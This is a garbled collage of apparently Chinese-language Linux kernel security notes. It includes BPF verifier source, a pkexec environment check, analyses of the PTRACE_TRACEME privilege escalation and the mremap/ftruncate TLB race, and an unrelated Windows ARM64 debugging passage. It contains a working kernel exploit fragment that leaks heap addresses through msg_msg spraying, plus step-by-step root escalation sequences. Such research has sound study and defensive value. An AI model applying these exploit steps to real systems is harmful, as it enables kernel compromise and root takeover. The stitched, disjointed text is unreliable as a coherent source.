switch (ptr_reg->type) { case PTR_TO_MAP_VALUE_OR_NULL: verbose(env, "R%d pointer arithmetic on %s prohibited, null-check it first\n", dst, reg_type_str[ptr_reg->type]); return -EACCES; case CONST_PTR_TO_MAP: /* smin_val represents the known value */ if (known && smin_val == 0 && opcode == BPF_ADD) break; fallthrough; case PTR_TO_PACKET_END: case PTR_TO_SOCKET: case PTR_TO_SOCKET_OR_NULL: case PTR_TO_SOCK_COMMON: case PTR_TO_SOCK_COMMON_OR_NULL: case PTR_TO_TCP_SOCK: case PTR_TO_TCP_SOCK_OR_NULL: case PTR_TO_XDP_SOCK: verbose(env, "R%d pointer arithmetic on %s prohibited\n", dst, reg_type_str[ptr_reg->type]); return -EACCES; default: break; } ... }
enum bpf_reg_type { NOT_INIT = 0, /* nothing was written into register */ SCALAR_VALUE, /* reg doesn't contain a valid pointer */ PTR_TO_CTX, /* reg points to bpf_context */ CONST_PTR_TO_MAP, /* reg points to struct bpf_map */ PTR_TO_MAP_VALUE, /* reg points to map element value */ PTR_TO_MAP_VALUE_OR_NULL, /* points to map elem value or NULL */ PTR_TO_STACK, /* reg == frame_pointer + offset */ PTR_TO_PACKET_META, /* skb->data - meta_len */ PTR_TO_PACKET, /* reg points to skb->data */ PTR_TO_PACKET_END, /* skb->data + headlen */ PTR_TO_FLOW_KEYS, /* reg points to bpf_flow_keys */ PTR_TO_SOCKET, /* reg points to struct bpf_sock */ PTR_TO_SOCKET_OR_NULL, /* reg points to struct bpf_sock or NULL */ PTR_TO_SOCK_COMMON, /* reg points to sock_common */ PTR_TO_SOCK_COMMON_OR_NULL, /* reg points to sock_common or NULL */ PTR_TO_TCP_SOCK, /* reg points to struct tcp_sock */ PTR_TO_TCP_SOCK_OR_NULL, /* reg points to struct tcp_sock or NULL */ PTR_TO_TP_BUFFER, /* reg points to a writable raw tp's buffer */ PTR_TO_XDP_SOCK, /* reg points to struct xdp_sock */ /* PTR_TO_BTF_ID points to a kernel struct that does not need * to be null checked by the BPF program. This does not imply the * pointer is _not_ null and in practice this can easily be a null * pointer when reading pointer chains. The assumption is program * context will handle null pointer dereference typically via fault * handling. The verifier must keep this in mind and can make no * assumptions about null or non-null when doing branch analysis. * Further, when passed into helpers the helpers can not, without * additional context, assume the value is non-null. */ PTR_TO_BTF_ID, /* PTR_TO_BTF_ID_OR_NULL points to a kernel struct that has not * been checked for null. Used primarily to inform the verifier * an explicit null check is required for this struct. */ PTR_TO_BTF_ID_OR_NULL, PTR_TO_MEM, /* reg points to valid memory region */ PTR_TO_MEM_OR_NULL, /* reg points to valid memory region or NULL */ PTR_TO_RDONLY_BUF, /* reg points to a readonly buffer */ PTR_TO_RDONLY_BUF_OR_NULL, /* reg points to a readonly buffer or NULL */ PTR_TO_RDWR_BUF, /* reg points to a read/write buffer */ PTR_TO_RDWR_BUF_OR_NULL, /* reg points to a read/write buffer or NULL */ PTR_TO_PERCPU_BTF_ID, /* reg points to a percpu kernel variable */ };
/* In case of 'scalar += pointer', dst_reg inherits pointer type and id. * The id may be overwritten later if we create a new variable offset. */ dst_reg->type = ptr_reg->type; dst_reg->id = ptr_reg->id; ... }
staticintcheck_cond_jmp_op(struct bpf_verifier_env *env, struct bpf_insn *insn, int *insn_idx) { ...
/* detect if R == 0 where R is returned from bpf_map_lookup_elem(). * NOTE: these optimizations below are related with pointer comparison * which will never be JMP32. */ if (!is_jmp32 && BPF_SRC(insn->code) == BPF_K && insn->imm == 0 && (opcode == BPF_JEQ || opcode == BPF_JNE) && reg_type_may_be_null(dst_reg->type)) { /* Mark all identical registers in each branch as either * safe or unknown depending R == 0 or R != 0 conditional. */ mark_ptr_or_null_regs(this_branch, insn->dst_reg, opcode == BPF_JNE); mark_ptr_or_null_regs(other_branch, insn->dst_reg, opcode == BPF_JEQ); } ... }
➜ uname -a Linux ubuntu 5.11.0-46-generic #51~20.04.1-Ubuntu SMP Fri Jan 7 06:51:40 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux ~ ➜ lsb_release -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu 20.04.3 LTS Release: 20.04 Codename: focal ➜ gcc --version gcc (Ubuntu 9.3.0-17ubuntu1~20.04) 9.3.0 Copyright (C) 2019 Free Software Foundation, Inc. This is free software; see the sourcefor copying conditions. There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. ➜ pkexec --version pkexec version 0.105
g_find_program_in_path() 在用户路径中定位第一个名为 program 的可执行程序,与 execvp() 定位它的方式相同。返回具有绝对路径名的已分配字符串,如果在路径中找不到程序,则返回 NULL。如果 program 已经是绝对路径,且如果 program 存在并且可执行,则返回 program 的副本,否则返回 NULL。
1 2 3 4
gchar* g_find_program_in_path ( const gchar* program )
printf("[*] Creating holes in primary messages...\n"); for (int i = HOLE_STEP; i < NUM_MSQIDS; i += HOLE_STEP) { if (read_msg(msqid[i], &msg_primary, sizeof(msg_primary), MTYPE_PRIMARY) < 0) goto err_rmid; }
// Use the fake secondary message to read out-of-bounds. printf("[*] Leaking adjacent secondary message...\n"); if (peek_msg(msqid[fake_idx], &msg_fake, sizeof(msg_fake), 1) < 0) goto err_rmid;
// Check if the leak is valid. if (*(int *)&msg_fake.mtext[SECONDARY_SIZE] != MSG_TAG) { printf("[-] Error could not leak adjacent secondary message.\n"); goto err_rmid; }
// The secondary message contains a pointer to the primary message. msg = (struct msg_msg *)&msg_fake.mtext[SECONDARY_SIZE - MSG_MSG_SIZE]; kheap_addr = msg->m_list_next; if (kheap_addr & (PRIMARY_SIZE - 1)) kheap_addr = msg->m_list_prev; printf("[+] kheap_addr: %" PRIx64 "\n", kheap_addr);
// Put kheap_addr at next to leak its content. Assumes zero bytes before // kheap_addr. printf("[*] Spraying fake secondary messages...\n"); memset(secondary_buf, 0, sizeof(secondary_buf)); build_msg_msg((void *)secondary_buf, 0x41414141, 0x42424242, sizeof(msg_fake.mtext), kheap_addr - MSG_MSGSEG_SIZE); if (spray_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0) goto err_rmid;
// Use the fake secondary message to read from kheap_addr. printf("[*] Leaking primary message...\n"); if (peek_msg(msqid[fake_idx], &msg_fake, sizeof(msg_fake), 1) < 0) goto err_rmid;
// Check if the leak is valid. if (*(int *)&msg_fake.mtext[PAGE_SIZE] != MSG_TAG) { printf("[-] Error could not leak primary message.\n"); goto err_rmid; }
// The primary message contains a pointer to the secondary message. msg = (struct msg_msg *)&msg_fake.mtext[PAGE_SIZE - MSG_MSG_SIZE]; kheap_addr = msg->m_list_next; if (kheap_addr & (SECONDARY_SIZE - 1)) kheap_addr = msg->m_list_prev;
// Calculate the address of the fake secondary message. kheap_addr -= SECONDARY_SIZE; printf("[+] kheap_addr: %" PRIx64 "\n", kheap_addr);
// https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/include/linux/pipe_fs_i.h struct pipe_buffer { struct page *page; unsigned int offset, len; const struct pipe_buf_operations *ops; unsigned int flags; unsigned long private; };
struct pipe_buf_operations { ... /* * When the contents of this pipe buffer has been completely * consumed by a reader, ->release() is called. */ void (*release)(struct pipe_inode_info *, struct pipe_buffer *); ... };
R0 : 永 远 为0 R1 : ra 返 回 地 址 R2 : tp , 线 程 指 针 R3 : sp , 栈 指 针 R4−R11: 参 数a0−a7 , a0/a1 返 回 R12−R20 : t0−t8 临 时 寄 存 器 R21 : r e s e r v e R22 : fp R23−R31 : s0−s8 c a l l e e
// 第一个问题,是 cred 的 rcu reference 问题 When called for PTRACE_TRACEME, ptrace_link() would obtain an RCU reference to the parent's objective credentials, then give that pointer to get_cred(). However, the object lifetime rules for things like struct cred do not permit unconditionally turning an RCU reference into a stable reference. // 第二个问题,tracee 记录的 tracer 的 cred 的问题 PTRACE_TRACEME records the parent's credentials as if the parent was acting as the subject, but that's not the case. If a malicious unprivileged child uses PTRACE_TRACEME and the parent is privileged, and at a later point, the parent process becomes attacker-controlled (because it drops privileges and calls execve()), the attacker ends up with control over two processes with a privileged ptrace relationship, which can be abused to ptrace a suid binary and obtain root privileges. Fix both of these by always recording the credentials of the process that is requesting the creation of the ptrace relationship: current_cred() can't change under us, and current is the proper subject for access control.
- 1, task A: fork()s a child, task B - 2, task B: fork()s a child, task C - 3, task B: execve(/some/special/suid/binary) - 4, task C: PTRACE_TRACEME (creates privileged ptrace relationship) - 5, task C: execve(/usr/bin/passwd) - 6, task B: drop privileges (setresuid(getuid(), getuid(), getuid())) - 7, task B: become dumpable again (e.g. execve(/some/other/binary)) - 8, task A: PTRACE_ATTACH to task B - 9, task A: use ptrace to take control of task B - 10, task B: use ptrace to take control of task C
如上场景有 3 个进程 A, B, C
第 4 步, task C 使用 PTRACE_TRACE 建立跟 B 的 trace link 时, 由于 B 此时是 euid = 0 (因为它刚刚执行了 suid binary), 所以 C 记录的 ptracer_cred 的 euid 也是 0
第 5 步, task C 随后执行 execve(suid binary), 根据我们上面的分析,由于 C 的 ptracer_cred 是特权的, 所以 ptracer_capable 函数检测通过,所以执行完 execve 后, task C 的 euid 也提权成 0 , 注意此时 B 和 C 的 trace link 还是有效的
第 6 步, task B 执行 setresuid 将自己降权, 这个降权的目的是为了能让 task A attach
第 8 步, task A 使用 PTRACE_ATTACH 建立跟 B 的 trace link, A 和 B 都是普通权限, 之后 A 可以控制 B 执行任何操作
第 9 步, task B 控制 task C 执行提权操作
前面 8 步,依据之前的代码分析都是成立的,那么第 9 步能不能成立呢?
执行第 9 步时, task B 本身是普通权限, task C 的 euid 是 root 权限, B 和 C 的 trace link 有效, 这种条件下 B 能不能发送 ptrace request 让 C 执行各种操作,包括提权操作?
根据之前我们分析的结果, task C 此时保存的 ptracer_cred 是特权 cred, 所以这时候 ptracer_capable 会通过, 也就是说我们回答了刚刚的问题, 这种情况下,普通权限的 task B 是可以发送 ptrace request 去读写 root 权限的 task C 的内存区和代码区的
至此,task C 记录的这个特权 ptracer_cred 实际上发挥了 2 种作用
1,可以让 task C 执行 execve(suid binary) 给自己提权
2,可以让普通权限的 task B 执行 ptrace 读写 task C 的代码区和内存区,从而控制 task C 执行任意操作
上面 2 点合起来,不就是完整的提权操作吗?
小结
我们仔细回顾上述代码分析过程, 才终于明白补丁描述写的这段话
1 2 3 4 5 6 7
PTRACE_TRACEME records the parent's credentials as if the parent was acting as the subject, but that's not the case. If a malicious unprivileged child uses PTRACE_TRACEME and the parent is privileged, and at a later point, the parent process becomes attacker-controlled (because it drops privileges and calls execve()), the attacker ends up with control over two processes with a privileged ptrace relationship, which can be abused to ptrace a suid binary and obtain root privileges.
这两个系统调用表面上看八竿子打不着, 但在 linux 内核的实现里, 他们的调用链条会出现一个竞态条件异常
1 2 3 4 5 6 7 8 9 10
1) sys_mremap() -> mremap_to()->move_vma()->move_page_tables(). move_page_tables() first calls move_ptes() in a loop, then performs a TLB flush with flush_tlb_range().
2) sys_ftruncate()->do_sys_ftruncate()->do_truncate()->notify_change() ->shmem_setattr()->unmap_mapping_range()->unmap_mapping_range_tree() ->unmap_mapping_range_vma() ->zap_page_range_single()->unmap_single_vma() ->unmap_page_range()->zap_pud_range()->zap_pmd_range()->zap_pte_range() can concurrently access the page tables of a process that is in move_page_tables(), between the move_ptes() loop and the TLB flush.
1) A 映射一个文件 a 到地址 X, 映射条件为: PROT_READ , MAP_SHARED
2) C 循环读取 X 的内容
3) A 调用 mremap 重新映射 X 到 Y, 这个调用会执行下面两个函数:
3.1) move_ptes , 该函数做如下操作:
3.1.1) 获取 X 页表和 Y 页表的锁
3.1.2) 遍历 X 对应页表的 pte , 释放之, 并在 Y 页表重建这些 pte
3.1.3) 释放 Y 页表的锁
3.1.4) 释放 X 页表的锁
3.2) flush_tlb_range : 刷新 X 对应的 TLB 缓存
4) B 调用 ftruncate 将文件 a 的文件大小改为 0, 这个调用会执行下面操作:
4.1) 获取 Y 页表的锁
4.2) 删除 Y 对应的页表
4.3) 释放 Y 对应的 pages
4.4) 刷新 Y 对应的 TLB 缓存
1 2 3 4 5 6
说明:
实际上 X 和 Y 是两块内存区域, 也就是说可能比一个 pmd 所容纳的地址范围大, 不管是 mremap 还是 ftruncate, 底层实现会将 X 和 Y 按照 pmd 为单位循环执行上表的操作, 即上表所说的 X 页表实际指的是 X 内存区域里的某个 pmd, 这里是为了表达方便简化处理, 下面的描述也是一样.
这里存在的竞态条件是当 4.3 已经执行完毕 (3.1.3 释放 Y 锁 4.1 就可以执行), 地址 Y 的内存已经释放, 物理页面已经返回给 伙伴系统 , 并再一次分配给新的虚拟内存, 而此时 3.2 还没有执行, 这种情况下, 虽然 X 的映射关系在页表里已经被清空, 但在 TLB 缓存里没有被清空, 线程 C 依然可以访问 X 的内存, 造成地址复用
在 versions > 4.9 的 linux 内核, Dirty 标记的页面会在 move_ptes 函数内部刷新 TLB , 而不是等到 3.2 由 flush_tlb_range 函数去刷新, 因此, race 发生之后, 线程 C 能通过 X 访问到的内存都是之前 non-Dirty 的页面, 即被写过的页面都无法复用.
这点改变会对 poc 和 exploit 造成什么影响? 留给大家思考.
简单版的 poc
根据上述分析, 一个简单的 poc 思路就出来了, 通过不断检测线程 C 从地址 X 读取的内容是不是初始内容就可以判断 race 是否被触发, 正常情况下, C 读取 X 只会有两种结果, 一种是 mremap 彻底完成, 即 3.2 执行完毕, 此时地址 X 为无效地址, C 的读操作引发进程奔溃退出, 第二种是 mremap 还未完成, C 读取的地址返回的是 X 的初始内容, 只有这两种情况才符合 mremap 函数的定义. 但是由于漏洞的存在, 实际运行会存在第三种情况, 即 C 读取 X 不会奔溃(3.2 还没执行, 地址映射还有效), 但内容变了( 4.3 执行完毕, 物理页面已经被其他地方复用)
对照qemu的源码可知,qemu为aarch64模拟器环境提供了串口设备PL011。我们研究了Linaro UEFI的源码EDK2并编译了对应的UEFI文件,确保使用的UEFI文件确实提供了串口功能。再用与Win10ARM64模拟器同样的配置安装了Ubuntu for ARM,在这个模拟器里PL011串口通信正常,串口采用MMIO,其映射的基址为0x09000000。但安装Win10后问题依旧:以基于串口的远程内核调试的启动配置来启动Win10RS4ARM64,系统加载的是kd.dll而非期望的kdcom.dll,故而推测是winload 没有识别PL011串口设备、没能去加载kdcom.dll。由此,我们决定直接将kdcom.dll替换kd.dll来使用。不过使用kdcom.dll替换kd.dll后出现了新的问题——系统引导异常,下面进一步分析其原因。